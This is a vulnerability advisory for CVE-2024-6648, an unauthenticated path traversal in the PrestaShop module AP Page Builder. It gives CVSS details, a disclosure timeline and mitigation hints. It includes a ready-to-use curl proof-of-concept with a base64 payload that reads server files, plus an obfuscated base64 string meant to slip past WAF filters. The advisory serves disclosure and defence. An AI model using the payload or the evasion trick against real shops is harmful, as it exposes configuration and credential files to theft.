[CVE-2024-6648] Absolute Path Traversal vulnerability in AP Page Builder versions prior to 4.0.0
Ap Page Builder is vulnerable to an absolute path traversal that allows the attacker to include system files by modifying the base64 config param submitted to apajax.php
Summary
- CVE ID: CVE-2024-6648
- Published at: 2025-05-08
- Advisory source: Incibe cert
- Platform: PrestaShop
- Product: Ap Page Builder
- Impacted release: < 4.0.0
- Product author: Apollo Theme
- Weakness: CWE-36
- Severity: high (8.7)
Description
Absolute Path Traversal vulnerability in AP Page Builder versions prior to 4.0.0 could allow an unauthenticated remote user to modify the ‘product_item_path’ within the ‘config’ JSON file, allowing them to read any file on the system.
WARNING : This exploit uses a Base64 payload, which may bypass most WAFs.
Be aware that it’s possible to obfuscate a Base64 string using special characters to evade detection - the base64_decode() function in PHP will silently strip them out.
For example, the following is a perfectly valid Base64 input for base64_decode: Li4$vLi4-vY#XBwL–2NvbmZpZy9wYXJhb-WV0Z$XJzLnB$ocA==
If you’re using ModSecurity 2, prefer base64DecodeExt over base64Decode to mitigate this technique.
CVSS base metrics
- Attack Vector (AV): Network
- Attack Complexity (AC): Low
- Attack Requirements (AT): None
- Privileges Required (PR): None
- User Interaction (UI): None
- Confidentiality (VC): High
- Integrity (VI): None
- Availability (VA): None
Vector string: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Proof of concept
POC has been published by n0d0n : https://github.com/n0d0n/CVE-2024-6648/blob/main/CVE-2024-6648.yaml
curl -v "https://preprod.X/modules/appagebuilder/apajax.php?config=eyJvcmRlcl9ieSI6ImlkX3Byb2R1Y3QiLCJuYl9wcm9kdWN0cyI6IjIiLCJ0b3RhbF9wYWdlIjoxLCAicHJvZHVjdF9pdGVtX3BhdGgiOiAiY29uZmlnLnhtbCIsICJjb2x1bW5zIjogMX0%3d&p=1"
Patch
See this : Help Center - PrestaShop
Timeline
| Date | Action |
|---|---|
| 2024-07-15 | Incibe report the vulnerability |
| 2024-08-16 | Due to the severity of the vulnerability, the large number of affected themes (over 2,000) across multiple marketplaces, and the time required for the module author to patch all of them, TouchWeb requests a one-year delay before public disclosure. |
| 2024-10-16 | Incibe accept a 9 months delay |
| 2025-05-08 | Incibe publish the vulnerability |
| 2025-05-08 | n0d0n publish the POC |
Links
DISCLAIMER: The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken.
This advisory and patch is licensed under CC BY-SA 4.0
